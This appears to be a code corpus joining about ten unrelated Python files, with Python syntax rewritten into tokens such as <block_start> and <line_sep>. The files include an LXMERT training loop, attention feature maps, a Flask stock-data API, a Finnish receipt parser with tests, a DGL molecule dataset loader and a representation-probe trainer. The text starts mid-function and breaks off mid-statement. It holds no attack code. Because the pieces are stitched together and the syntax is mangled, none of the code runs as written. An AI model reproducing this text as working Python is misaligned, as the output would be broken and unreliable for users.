<block_end><block_end><def_stmt>evaluate_epoch self eval_tuple:DataTuple iters:int=-1<block_start>self.model.eval()<line_sep>eval_ld=eval_tuple.loader<line_sep>total_loss=0.<line_sep>total_losses=0.<line_sep>uid2ans={}<for_stmt>i,batch enumerate(tqdm(eval_ld))<block_start>loss,losses,logit=self.valid_batch(batch)<line_sep>total_loss<augadd>loss<line_sep>total_losses<augadd>losses<if_stmt>args.task_qa<block_start>score,label=logit.max(1)<for_stmt>uid,l zip(batch["uid"] label.cpu().numpy())<block_start>ans=train_tuple.dataset.answer_table.id2ans(l)<line_sep>uid2ans[uid]=ans<block_end><block_end><if_stmt>i<eq>iters<block_start><break><block_end><block_end><if_stmt>args.local_rank<le>0<block_start>print("The valid loss is %0.4f"%(total_loss/len(eval_ld)))<line_sep>losses_str="The losses are "<line_sep>total_losses=total_losses.squeeze(0)<for_stmt>name,loss zip(LOSSES_NAME total_losses/len(eval_ld))<block_start>losses_str<augadd>"%s: %0.4f "%(name loss)<block_end>print(losses_str)<if_stmt>args.task_qa<block_start>eval_tuple.evaluator.evaluate(uid2ans pprint=<true>)<block_end><block_end><return>total_loss/len(eval_ld)<block_end><def_stmt>save self name<block_start>torch.save(self.model.state_dict() os.path.join(args.output "%s_LXRT.pth"%name))<if_stmt>args.use_separate_optimizer_for_visual<block_start>torch.save(self.optim.optimizers[0].state_dict() os.path.join(args.output "%s_LXRT_AdamOptim.pth"%name))<line_sep>torch.save(self.optim.optimizers[1].state_dict() os.path.join(args.output "%s_LXRT_SGDOptim.pth"%name))<block_end><else_stmt><block_start>torch.save(self.optim.state_dict() os.path.join(args.output "%s_LXRT_AdamOptim.pth"%name))<block_end>torch.save(self.scheduler.state_dict() os.path.join(args.output "%s_LXRT_Scheduler.pth"%name))<block_end><def_stmt>load self path<block_start>print("Load BERT extractor from %s"%path)<line_sep>state_dict=torch.load("%s_LXRT.pth"%path map_location='cpu')<line_sep>'''new_state_dict = {}
for key, value in state_dict.items():
if key.startswith("module."):
new_state_dict[key.replace("module.", "")] = value
else:
new_state_dict[key] = value'''<line_sep>load_state_dict_flexible_with_fp16(self.model state_dict)<line_sep>#self.model.load_state_dict(new_state_dict)
<if_stmt>os.path.exists("{}_LXRT_SGDOptim.pth".format(path))# load sgd
<block_start>print("Load SGD from {}".format("{}_LXRT_SGDOptim.pth".format(path)))<line_sep>sgd_state=torch.load("{}_LXRT_SGDOptim.pth".format(path) map_location='cpu')<line_sep>self.optim.optimizers[-1].load_state_dict(sgd_state)<block_end><if_stmt>args.not_load_adam_optimizer<block_start><pass><block_end><elif_stmt>os.path.exists("{}_LXRT_AdamOptim.pth".format(path))# load sgd
<block_start>print("Load Adam")<line_sep>sgd_state=torch.load("{}_LXRT_AdamOptim.pth".format(path) map_location='cpu')<line_sep>self.optim.optimizers[0].load_state_dict(sgd_state)<block_end><if_stmt>args.not_load_scheduler<block_start><pass><block_end><elif_stmt>os.path.exists("{}_LXRT_Scheduler.pth".format(path))# load sgd
<block_start>print('Load scheduler')<line_sep>sgd_state=torch.load("{}_LXRT_Scheduler.pth".format(path) map_location='cpu')<line_sep>self.scheduler.load_state_dict(sgd_state)<block_end><block_end><def_stmt>load_lxmert self path<block_start>print("Load LXMERT model from %s"%path)<line_sep>state_dict=torch.load("%s_LXRT.pth"%path map_location="cpu")<line_sep># Do not load any answer head
<for_stmt>key list(state_dict.keys())<block_start><if_stmt>'answer'<in>key<block_start>state_dict.pop(key)<block_end><block_end># Change Multi GPU to single GPU
new_state_dict={}<for_stmt>key,value state_dict.items()<block_start><if_stmt>key.startswith("module.")<block_start>new_state_dict[key[len("module."):]]=value<block_end><block_end>state_dict=new_state_dict<line_sep>load_keys=set(state_dict.keys())<line_sep>model_keys=set(self.model.state_dict().keys())<line_sep>print()<line_sep>print("Keys in loaded but not in model:")<for_stmt>key sorted(load_keys.difference(model_keys))<block_start>print(key)<block_end>print()<line_sep>print("Keys in model but not in loaded:")<for_stmt>key sorted(model_keys.difference(load_keys))<block_start>print(key)<block_end>print()<line_sep>load_state_dict_flexible_with_fp16(self.model state_dict)<line_sep>#self.model.load_state_dict(state_dict, strict=False)
<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start><import_stmt>sys<if_stmt>args.gpu<eq>0<block_start>print("\n\n")<line_sep>print(" ".join(sys.argv))<line_sep>print("\n\n")<block_end>lxmert=LXMERT(max_seq_length=20)<line_sep>lxmert.train(train_tuple valid_tuple)<block_end> |
<class_stmt>TimeoutError(Exception)<block_start>"""
Indicates a database operation timed out in some way.
"""<line_sep><pass><block_end> |
#
# Copyright (c) 2020 Idiap Research Institute, http://www.idiap.ch/
# Written by <NAME> <<EMAIL>>
#
"""Create the feature map interface and some commonly used feature maps.
All attention implementations that expect a feature map shall receive a factory
function that returns a feature map instance when called with the query
dimensions.
"""<import_from_stmt>functools partial<import_stmt>torch<import_from_stmt>torch.nn Module<class_stmt>FeatureMap(Module)<block_start>"""Define the FeatureMap interface."""<def_stmt>__init__ self query_dims<block_start>super().__init__()<line_sep>self.query_dims=query_dims<block_end><def_stmt>new_feature_map self device<block_start>"""Create a new instance of this feature map. In particular, if it is a
random feature map sample new parameters."""<line_sep><raise>NotImplementedError()<block_end><def_stmt>forward_queries self x<block_start>"""Encode the queries `x` using this feature map."""<line_sep><return>self(x)<block_end><def_stmt>forward_keys self x<block_start>"""Encode the keys `x` using this feature map."""<line_sep><return>self(x)<block_end><def_stmt>forward self x<block_start>"""Encode x using this feature map. For symmetric feature maps it
suffices to define this function, but for asymmetric feature maps one
needs to define the `forward_queries` and `forward_keys` functions."""<line_sep><raise>NotImplementedError()<block_end>@classmethod<def_stmt>factory cls *args **kwargs<block_start>"""Return a function that when called with the query dimensions returns
an instance of this feature map.
It is inherited by the subclasses so it is available in all feature
maps.
"""<def_stmt>inner query_dims<block_start><return>cls(query_dims *args **kwargs)<block_end><return>inner<block_end><block_end><class_stmt>ActivationFunctionFeatureMap(FeatureMap)<block_start>"""Define a feature map that is simply an element-wise activation
function."""<def_stmt>__init__ self query_dims activation_function<block_start>super().__init__(query_dims)<line_sep>self.activation_function=activation_function<block_end><def_stmt>new_feature_map self device<block_start><return><block_end><def_stmt>forward self x<block_start><return>self.activation_function(x)<block_end><block_end>elu_feature_map=ActivationFunctionFeatureMap.factory(<lambda>x:torch.nn.functional.elu(x)+1)<line_sep> |
# -*- coding: utf-8 -*-
<import_from_stmt>flask request<import_from_stmt>fooltrader.api.esapi esapi<import_from_stmt>fooltrader.rest app<import_from_stmt>fooltrader.rest.common success get_request_params_as_list<line_sep>@app.route('/tech/kdata/<securityid>' methods=['GET'])<def_stmt>get_kdata securityid<block_start>the_date=request.args.get('the_date')<line_sep>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>level=request.args.get('level' 'day')<line_sep>fields=request.args.get('fields')<if_stmt><not>fields<block_start>fields=['timestamp' 'open' 'high' 'low' 'close' 'volume']<block_end>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 500)<line_sep>result=esapi.es_get_kdata(security_item=securityid the_date=the_date start_date=start_date end_date=end_date fields=fields csv=<true> level=level from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/statistic/<securityid>' methods=['GET'])<def_stmt>get_statistic securityid<block_start>the_date=request.args.get('the_date')<line_sep>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>level=request.args.get('level' 'day')<line_sep>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 500)<line_sep>result=esapi.es_get_statistic(security_item=securityid the_date=the_date start_date=start_date end_date=end_date level=level from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/user_statistic/<main_chain>' defaults={'user_id':<none>} methods=['GET'])@app.route('/tech/user_statistic/<main_chain>/<user_id>' methods=['GET'])<def_stmt>get_user_statistic main_chain user_id<block_start>start_date=request.args.get('start_date')<line_sep>end_date=request.args.get('end_date')<line_sep>security_id=request.args.get('security_id' 'cryptocurrency_contract_RAM-EOS')<line_sep>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 100)<line_sep>result=esapi.es_get_user_statistic(main_chain=main_chain security_id=security_id user_id=user_id start_date=start_date end_date=end_date from_idx=int(from_idx) size=int(size))<line_sep><return>success(result)<block_end>@app.route('/tech/account/<main_chain>' defaults={'user_id':<none>} methods=['GET'])@app.route('/tech/account/<main_chain>/<user_id>' methods=['GET'])<def_stmt>get_accounts main_chain user_id<block_start>start_vol=request.args.get('start_vol')<line_sep>end_vol=request.args.get('end_vol')<line_sep>from_idx=request.args.get('from_idx' 0)<line_sep>size=request.args.get('size' 100)<line_sep>order=request.args.get('order' 'totalEos')<line_sep>fields=get_request_params_as_list(request 'fields')<line_sep>result=esapi.es_get_accounts(main_chain=main_chain user_id=user_id start_vol=int(start_vol) fields=fields end_vol=int(end_vol) from_idx=int(from_idx) size=int(size) order=order)<line_sep><return>success(result)<block_end> |
<import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>models.sentence_embedding_baseline SmoothInverseFrequencyBaseline<import_from_stmt>models.mpcnn MPCNN<import_from_stmt>models.mpcnn_lite MPCNNLite<import_from_stmt>models.bimpm BiMPM<def_stmt>get_model args dataset_cls embedding<block_start><if_stmt>args.model<eq>'sif'<block_start>args.supervised=<not>args.unsupervised<line_sep>args.remove_special_direction=<not>args.no_remove_special_direction<line_sep>model=SmoothInverseFrequencyBaseline(dataset_cls.num_classes args.alpha embedding remove_special_direction=args.remove_special_direction frequency_dataset=args.frequency_dataset supervised=args.supervised)<block_end><elif_stmt>args.model<eq>'mpcnn'<block_start>model=MPCNN(embedding 300 300 20 [1 2 3 np.inf] 150 dataset_cls.num_classes 0.5)<block_end><elif_stmt>args.model<eq>'mpcnn-lite'<block_start>model=MPCNNLite(embedding 300 300 [1 2 3 np.inf] 150 dataset_cls.num_classes 0.5)<block_end><elif_stmt>args.model<eq>'bimpm'<block_start>model=BiMPM(embedding 300 50 20 100 dataset_cls.num_classes 0.1)<block_end><else_stmt><block_start><raise>ValueError(f'Unrecognized dataset: {args.model}')<block_end><if_stmt>args.device<ne>-1<block_start><with_stmt>torch.cuda.device(args.device)<block_start>model=model.cuda()<block_end><block_end><return>model<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>unittest<import_from_stmt>datetime datetime<line_sep>testtext=u"""
k-supermarket länsiväylä
puh. 01042 33900
4 k4 m000004/1939 21:01 28-05-2014
sallinen maapähkinä lkg 4.40
valio rasvaton maito 1,51 1.55
elonen ruisevas 540g 9kpl 1.59
pirkka banaani 0.75
es tonnikalahiutale 185/1409 vedessä 0.79
pirkka maksamakkara 300g 1.00
yhteensä 10.08
korttitapahtuma
kortti visa electron
*mu: *n* *m* 7956 cp
sovellus la us: a000oo00032010
tap.nro/varmennus 00942/151372
yritys/ala 020327326100/5411
autbnt1901ntli cf70d1e6903fcb8a
visa he: 1405223010942
debit/veloitus 10,03 eur
alv veroton vero verollinen
2 14.00% 8.84 1.24 10.08
yhteensä 8.84 1.24 10.08"""<def_stmt>parse_float txt<block_start>""" Returns None or parsed float value. """<line_sep># Floats must have decimal point
<if_stmt>txt.find('.')<eq>-1<block_start><return><none><block_end># Parse float using python's built-in converter
<try_stmt><block_start><return>float(txt)<block_end><except_stmt>ValueError<block_start><return><none><block_end><block_end><def_stmt>parse_date txt<block_start>""" Returns None or parsed date as {h, m, D, M, Y}. """<line_sep>date=<none><line_sep>clock=<none><for_stmt>word txt.split(' ')<block_start><if_stmt>date<is><none><block_start><try_stmt><block_start>date=datetime.strptime(word "%d-%m-%Y")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><try_stmt><block_start>date=datetime.strptime(word "%d.%m.%Y")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><block_end><if_stmt>clock<is><none><block_start><try_stmt><block_start>clock=datetime.strptime(word "%H:%M")<line_sep><continue><block_end><except_stmt>ValueError<block_start><pass><block_end><block_end><block_end><if_stmt>date<is><not><none><and>clock<is><not><none><block_start><return>{'h':clock.hour 'm':clock.minute 'D':date.day 'M':date.month 'Y':date.year}<block_end><return><none><block_end><def_stmt>parse_product_line txt<block_start>""" Returns None or {name, price}
Example: { name:'<NAME>', price: 0.75 }
"""<line_sep>invalid_starts=['yhtee' 'k-plussa' 'plussaa']<line_sep>words=txt.split(' ')<if_stmt>len(words)<ge>2# Lines starting with any of invalid_starts are not products
<block_start><if_stmt><not>any([words[0].startswith(s)<for>s invalid_starts])# Price is the last word of the line
<block_start>price=parse_float(words[-1])<if_stmt>price<is><not><none><block_start>product_name=' '.join(words[0:-1])<line_sep># Calculate percentage of digits in product_name
number_acc=<lambda>acc c:acc+(1<if>c.isdigit()<else>0)<line_sep>characters=float(len(product_name))<line_sep>digit_percent=reduce(number_acc product_name 0)/characters<line_sep># Names with over 50% digits are not product names
<if_stmt>digit_percent<g>0.5<block_start><return><none><block_end><return>{'name':product_name 'price':float("{0:.2f}".format(price))}<block_end><block_end><block_end><return><none><block_end><def_stmt>parse_sum txt<block_start>""" Returns None or total sum as float. """<line_sep>words=txt.split(' ')<if_stmt>len(words)<ge>2<block_start><if_stmt>words[0].startswith('yhtee')# Try float parsing
<block_start>total_sum=parse_float(words[-1])<if_stmt>total_sum<is><not><none># Return sum with 2 decimal precision
<block_start><return>float("{0:.2f}".format(total_sum))<block_end><block_end><block_end><return><none><block_end><def_stmt>parse_credit_card txt<block_start>""" Returns None or True. """<if_stmt>txt.startswith('korttitapahtuma')<block_start><return><true><block_end><return><none><block_end><def_stmt>preprocess txt<block_start>""" Removes empty lines and unnecessary whitespace. """<line_sep><return>[line.strip()<for>line txt.splitlines()<if>line.strip()<ne>""]<block_end><def_stmt>parse_receipt txt<block_start>""" Parses receipt and returns parsed data. """<line_sep>result={'products':[] 'date':<none> 'total_sum':<none> 'shop_name':<none> 'credit_card':<false>}<line_sep>preprocessed_lines=preprocess(txt)<if_stmt>len(preprocessed_lines)<eq>0<block_start><return>result<block_end>result['shop_name']=preprocessed_lines[0]<for_stmt>line preprocessed_lines<block_start>parsed_product=parse_product_line(line)<if_stmt>parsed_product<is><not><none><block_start>result['products'].append(parsed_product)<block_end>parsed_sum=parse_sum(line)<if_stmt>parsed_sum<is><not><none><block_start>result['total_sum']=parsed_sum<block_end>parsed_card=parse_credit_card(line)<if_stmt>parsed_card<is><not><none><block_start>result['credit_card']=parsed_card<block_end>parsed_date=parse_date(line)<if_stmt>parsed_date<is><not><none><block_start>result['date']=parsed_date<block_end><block_end><return>result<block_end><class_stmt>ParserTest(unittest.TestCase)<block_start>""" Tests all receipt parser functions. """<def_stmt>test_float self<block_start>""" Tests parse_float """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_float(inp) expected)<line_sep># Valid floats
test('0.00' 0.0)<line_sep>test('13.75' 13.75)<line_sep>test(u'0.05' 0.05)<line_sep># Invalid floats
test('' <none>)<line_sep>test(' ' <none>)<line_sep>test('abc' <none>)<block_end><def_stmt>test_product_line self<block_start>""" Tests parse_product_line """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_product_line(inp) expected)<line_sep># Valid product lines
test('valio rasvaton maito 1,5l 1.55' {'name':'valio rasvaton maito 1,5l' 'price':1.55})<line_sep>test('pirkka maksamakkara 300g 1.00' {'name':'pirkka maksamakkara 300g' 'price':1.00})<line_sep>test(u'sallinen maapähkinä 1kg 4.40' {'name':u'sallinen maapähkinä 1kg' 'price':4.4})<line_sep># Invalid product lines
test('4 k4 m000004/1939 21:01 28-05-2014' <none>)<line_sep>test('yhteensä 8.84 1.24 10.08' <none>)<line_sep>test('puh. 01042 33900' <none>)<line_sep>test(u'korttitapahtuma' <none>)<line_sep>test("2 14.0q% 9.95 1.39 11.34" <none>)<block_end><def_stmt>test_sum self<block_start>""" Tests parse_sum """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_sum(inp) expected)<line_sep># Valid sums
test(u'yhteensä 15.62' 15.62)<line_sep>test(u'yhteensä 61.00' 61.00)<line_sep># Invalid sums
test(u'yhteensä 6i 00' <none>)<line_sep>test('' <none>)<block_end><def_stmt>test_date self<block_start>""" Tests parse_date """<line_sep>test=<lambda>inp expected:self.assertEqual(parse_date(inp) expected)<line_sep># Valid dates
test('15:57 27-07-2014' {'h':15 'm':57 'D':27 'M':7 'Y':2014})<line_sep>test('16.07.2014 23:15' {'h':23 'm':15 'D':16 'M':7 'Y':2014})<line_sep># Invalid dates
test('64:99 12-13-2014' <none>)<line_sep>test('abc' <none>)<line_sep>test(' ' <none>)<line_sep>test('' <none>)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end> |
# -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Creating datasets from .csv files for molecular property prediction.
<import_stmt>dgl.backend<as>F<import_stmt>numpy<as>np<import_stmt>os<import_stmt>pandas<as>pd<import_stmt>torch<import_from_stmt>dgl.data.utils save_graphs load_graphs<import_from_stmt>..utils.io pmap<line_sep>__all__=['MoleculeCSVDataset']<class_stmt>MoleculeCSVDataset(object)<block_start>"""MoleculeCSVDataset
This is a general class for loading molecular data from :class:`pandas.DataFrame`.
In data pre-processing, we construct a binary mask indicating the existence of labels.
All molecules are converted into DGLGraphs. After the first-time construction, the
DGLGraphs can be saved for reloading so that we do not need to reconstruct them every time.
Parameters
----------
df: pandas.DataFrame
Dataframe including smiles and labels. Can be loaded by pandas.read_csv(file_path).
One column includes smiles and some other columns include labels.
smiles_to_graph: callable, str -> DGLGraph
A function turning a SMILES string into a DGLGraph.
node_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : None or callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
smiles_column: str
Column name for smiles in ``df``.
cache_file_path: str
Path to store the preprocessed DGLGraphs. For example, this can be ``'dglgraph.bin'``.
task_names : list of str or None, optional
Columns in the data frame corresponding to real-valued labels. If None, we assume
all columns except the smiles_column are labels. Default to None.
load : bool, optional
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to False.
log_every : bool, optional
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1. Default to 1000.
init_mask : bool, optional
Whether to initialize a binary mask indicating the existence of labels. Default to True.
n_jobs : int, optional
The maximum number of concurrently running jobs for graph construction and featurization,
using joblib backend. Default to 1.
error_log : str, optional
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""<def_stmt>__init__ self df smiles_to_graph node_featurizer edge_featurizer smiles_column cache_file_path task_names=<none> load=<false> log_every=1000 init_mask=<true> n_jobs=1 error_log=<none><block_start>self.df=df<line_sep>self.smiles=self.df[smiles_column].tolist()<if_stmt>task_names<is><none><block_start>self.task_names=self.df.columns.drop([smiles_column]).tolist()<block_end><else_stmt><block_start>self.task_names=task_names<block_end>self.n_tasks=len(self.task_names)<line_sep>self.cache_file_path=cache_file_path<line_sep>self._pre_process(smiles_to_graph node_featurizer edge_featurizer load log_every init_mask n_jobs error_log)<line_sep># Only useful for binary classification tasks
self._task_pos_weights=<none><block_end><def_stmt>_pre_process self smiles_to_graph node_featurizer edge_featurizer load log_every init_mask n_jobs error_log<block_start>"""Pre-process the dataset
* Convert molecules from smiles format into DGLGraphs
and featurize their atoms
* Set missing labels to be 0 and use a binary masking
matrix to mask them
Parameters
----------
smiles_to_graph : callable, SMILES -> DGLGraph
Function for converting a SMILES (str) into a DGLGraph.
node_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for nodes like atoms in a molecule, which can be used to update
ndata for a DGLGraph.
edge_featurizer : callable, rdkit.Chem.rdchem.Mol -> dict
Featurization for edges like bonds in a molecule, which can be used to update
edata for a DGLGraph.
load : bool
Whether to load the previously pre-processed dataset or pre-process from scratch.
``load`` should be False when we want to try different graph construction and
featurization methods and need to preprocess from scratch. Default to True.
log_every : bool
Print a message every time ``log_every`` molecules are processed. It only comes
into effect when :attr:`n_jobs` is greater than 1.
init_mask : bool
Whether to initialize a binary mask indicating the existence of labels.
n_jobs : int
Degree of parallelism for pre processing. Default to 1.
error_log : str
Path to a CSV file of molecules that RDKit failed to parse. If not specified,
the molecules will not be recorded.
"""<if_stmt>os.path.exists(self.cache_file_path)<and>load# DGLGraphs have been constructed before, reload them
<block_start>print('Loading previously saved dgl graphs...')<line_sep>self.graphs,label_dict=load_graphs(self.cache_file_path)<line_sep>self.labels=label_dict['labels']<if_stmt>init_mask<block_start>self.mask=label_dict['mask']<block_end>self.valid_ids=label_dict['valid_ids'].tolist()<block_end><else_stmt><block_start>print('Processing dgl graphs from scratch...')<if_stmt>n_jobs<g>1<block_start>self.graphs=pmap(smiles_to_graph self.smiles node_featurizer=node_featurizer edge_featurizer=edge_featurizer n_jobs=n_jobs)<block_end><else_stmt><block_start>self.graphs=[]<for_stmt>i,s enumerate(self.smiles)<block_start><if_stmt>(i+1)%log_every<eq>0<block_start>print('Processing molecule {:d}/{:d}'.format(i+1 len(self)))<block_end>self.graphs.append(smiles_to_graph(s node_featurizer=node_featurizer edge_featurizer=edge_featurizer))<block_end><block_end># Keep only valid molecules
self.valid_ids=[]<line_sep>graphs=[]<line_sep>failed_mols=[]<for_stmt>i,g enumerate(self.graphs)<block_start><if_stmt>g<is><not><none><block_start>self.valid_ids.append(i)<line_sep>graphs.append(g)<block_end><else_stmt><block_start>failed_mols.append((i self.smiles[i]))<block_end><block_end><if_stmt>error_log<is><not><none><block_start><if_stmt>len(failed_mols)<g>0<block_start>failed_ids,failed_smis=map(list zip(*failed_mols))<block_end><else_stmt><block_start>failed_ids,failed_smis=[] []<block_end>df=pd.DataFrame({'raw_id':failed_ids 'smiles':failed_smis})<line_sep>df.to_csv(error_log index=<false>)<block_end>self.graphs=graphs<line_sep>_label_values=self.df[self.task_names].values<line_sep># np.nan_to_num will also turn inf into a very large number
self.labels=F.zerocopy_from_numpy(np.nan_to_num(_label_values).astype(np.float32))[self.valid_ids]<line_sep>valid_ids=torch.tensor(self.valid_ids)<if_stmt>init_mask<block_start>self.mask=F.zerocopy_from_numpy((~np.isnan(_label_values)).astype(np.float32))[self.valid_ids]<line_sep>save_graphs(self.cache_file_path self.graphs labels={'labels':self.labels 'mask':self.mask 'valid_ids':valid_ids})<block_end><else_stmt><block_start>self.mask=<none><line_sep>save_graphs(self.cache_file_path self.graphs labels={'labels':self.labels 'valid_ids':valid_ids})<block_end><block_end>self.smiles=[self.smiles[i]<for>i self.valid_ids]<block_end><def_stmt>__getitem__ self item<block_start>"""Get datapoint with index
Parameters
----------
item : int
Datapoint index
Returns
-------
str
SMILES for the ith datapoint
DGLGraph
DGLGraph for the ith datapoint
Tensor of dtype float32 and shape (T)
Labels of the datapoint for all tasks
Tensor of dtype float32 and shape (T), optional
Binary masks indicating the existence of labels for all tasks. This is only
generated when ``init_mask`` is True in the initialization.
"""<if_stmt>self.mask<is><not><none><block_start><return>self.smiles[item] self.graphs[item] self.labels[item] self.mask[item]<block_end><else_stmt><block_start><return>self.smiles[item] self.graphs[item] self.labels[item]<block_end><block_end><def_stmt>__len__ self<block_start>"""Size for the dataset
Returns
-------
int
Size for the dataset
"""<line_sep><return>len(self.smiles)<block_end><def_stmt>task_pos_weights self indices<block_start>"""Get weights for positive samples on each task
This should only be used when all tasks are binary classification.
It's quite common that the number of positive samples and the number of
negative samples are significantly different for binary classification.
To compensate for the class imbalance issue, we can weight each datapoint
in loss computation.
In particular, for each task we will set the weight of negative samples
to be 1 and the weight of positive samples to be the number of negative
samples divided by the number of positive samples.
Parameters
----------
indices : 1D LongTensor
The function will compute the weights on the data subset specified by
the indices, e.g. the indices for the training set.
Returns
-------
Tensor of dtype float32 and shape (T)
Weight of positive samples on all tasks
"""<line_sep>task_pos_weights=torch.ones(self.labels.shape[1])<line_sep>num_pos=F.sum(self.labels[indices] dim=0)<line_sep>num_indices=F.sum(self.mask[indices] dim=0)<line_sep>task_pos_weights[num_pos<g>0]=((num_indices-num_pos)/num_pos)[num_pos<g>0]<line_sep><return>task_pos_weights<block_end><block_end> |
<def_stmt>test_lint <block_start><import_stmt>nose.plugins.isolate<block_end> |
# __init__.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue Sep 7 21:35:53 UTC 2021
"""Universal WiFi adapter implementation for Open GoPro WiFi interface"""<import_from_stmt>.wireless Wireless<line_sep> |
<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>.utils EarlyStopping appendabledict calculate_multiclass_accuracy calculate_multiclass_f1_score append_suffix compute_dict_average<import_from_stmt>copy deepcopy<import_stmt>numpy<as>np<import_from_stmt>torch.utils.data RandomSampler BatchSampler<import_from_stmt>.categorization summary_key_dict<class_stmt>LinearProbe(nn.Module)<block_start><def_stmt>__init__ self input_dim num_classes=255<block_start>super().__init__()<line_sep>self.model=nn.Linear(in_features=input_dim out_features=num_classes)<block_end><def_stmt>forward self feature_vectors<block_start><return>self.model(feature_vectors)<block_end><block_end><class_stmt>FullySupervisedLinearProbe(nn.Module)<block_start><def_stmt>__init__ self encoder num_classes=255<block_start>super().__init__()<line_sep>self.encoder=deepcopy(encoder)<line_sep>self.probe=LinearProbe(input_dim=self.encoder.hidden_size num_classes=num_classes)<block_end><def_stmt>forward self x<block_start>feature_vec=self.encoder(x)<line_sep><return>self.probe(feature_vec)<block_end><block_end><class_stmt>ProbeTrainer()<block_start><def_stmt>__init__ self encoder=<none> method_name="my_method" wandb=<none> patience=15 num_classes=256 fully_supervised=<false> save_dir=".models" device=torch.device("cuda"<if>torch.cuda.is_available()<else>"cpu") lr=5e-4 epochs=100 batch_size=64 representation_len=256<block_start>self.encoder=encoder<line_sep>self.wandb=wandb<line_sep>self.device=device<line_sep>self.fully_supervised=fully_supervised<line_sep>self.save_dir=save_dir<line_sep>self.num_classes=num_classes<line_sep>self.epochs=epochs<line_sep>self.lr=lr<line_sep>self.batch_size=batch_size<line_sep>self.patience=patience<line_sep>self.method=method_name<line_sep>self.feature_size=representation_len<line_sep>self.loss_fn=nn.CrossEntropyLoss()<line_sep># bad convention, but these get set in "create_probes"
self.probes=self.early_stoppers=self.optimizers=self.schedulers=<none><block_end><def_stmt>create_probes self sample_label<block_start><if_stmt>self.fully_supervised<block_start><assert_stmt>self.encoder<ne><none> "for fully supervised you must provide an encoder!"<line_sep>self.probes={k:FullySupervisedLinearProbe(encoder=self.encoder num_classes=self.num_classes).to(self.device)<for>k sample_label.keys()}<block_end><else_stmt><block_start>self.probes={k:LinearProbe(input_dim=self.feature_size num_classes=self.num_classes).to(self.device)<for>k sample_label.keys()}<block_end>self.early_stoppers={k:EarlyStopping(patience=self.patience verbose=<false> name=k+"_probe" save_dir=self.save_dir)<for>k sample_label.keys()}<line_sep>self.optimizers={k:torch.optim.Adam(list(self.probes[k].parameters()) eps=1e-5 lr=self.lr)<for>k sample_label.keys()}<line_sep>self.schedulers={k:torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizers[k] patience=5 factor=0.2 verbose=<true> mode='max' min_lr=1e-5)<for>k sample_label.keys()}<block_end><def_stmt>generate_batch self episodes episode_labels<block_start>total_steps=sum([len(e)<for>e episodes])<assert_stmt>total_steps<g>self.batch_size<line_sep>print('Total Steps: {}'.format(total_steps))<line_sep># Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler=BatchSampler(RandomSampler(range(len(episodes)) replacement=<true> num_samples=total_steps) self.batch_size drop_last=<true>)<for_stmt>indices sampler<block_start>episodes_batch=[episodes[x]<for>x indices]<line_sep>episode_labels_batch=[episode_labels[x]<for>x indices]<line_sep>xs,labels=[] appendabledict()<for_stmt>ep_ind,episode enumerate(episodes_batch)# Get one sample from this episode
<block_start>t=np.random.randint(len(episode))<line_sep>xs.append(episode[t])<line_sep>labels.append_update(episode_labels_batch[ep_ind][t])<block_end><yield>torch.stack(xs).float().to(self.device)/255. labels<block_end><block_end><def_stmt>probe self batch k<block_start>probe=self.probes[k]<line_sep>probe.to(self.device)<if_stmt>self.fully_supervised# if method is supervised batch is a batch of frames and probe is a full encoder + linear or nonlinear probe
<block_start>preds=probe(batch)<block_end><elif_stmt><not>self.encoder# if encoder is None then inputs are vectors
<block_start>f=batch.detach()<assert_stmt>len(f.squeeze().shape)<eq>2 "if input is not a batch of vectors you must specify an encoder!"<line_sep>preds=probe(f)<block_end><else_stmt><block_start><with_stmt>torch.no_grad()<block_start>self.encoder.to(self.device)<line_sep>f=self.encoder(batch).detach()<block_end>preds=probe(f)<block_end><return>preds<block_end><def_stmt>do_one_epoch self episodes label_dicts<block_start>sample_label=label_dicts[0][0]<line_sep>epoch_loss,accuracy={k+"_loss":[]<for>k sample_label.keys()<if><not>self.early_stoppers[k].early_stop} {k+"_acc":[]<for>k sample_label.keys()<if><not>self.early_stoppers[k].early_stop}<line_sep>data_generator=self.generate_batch(episodes label_dicts)<for_stmt>step,(x labels_batch) enumerate(data_generator)<block_start><for_stmt>k,label labels_batch.items()<block_start><if_stmt>self.early_stoppers[k].early_stop<block_start><continue><block_end>optim=self.optimizers[k]<line_sep>optim.zero_grad()<line_sep>label=torch.tensor(label).long().to(self.device)<line_sep>preds=self.probe(x k)<line_sep>loss=self.loss_fn(preds 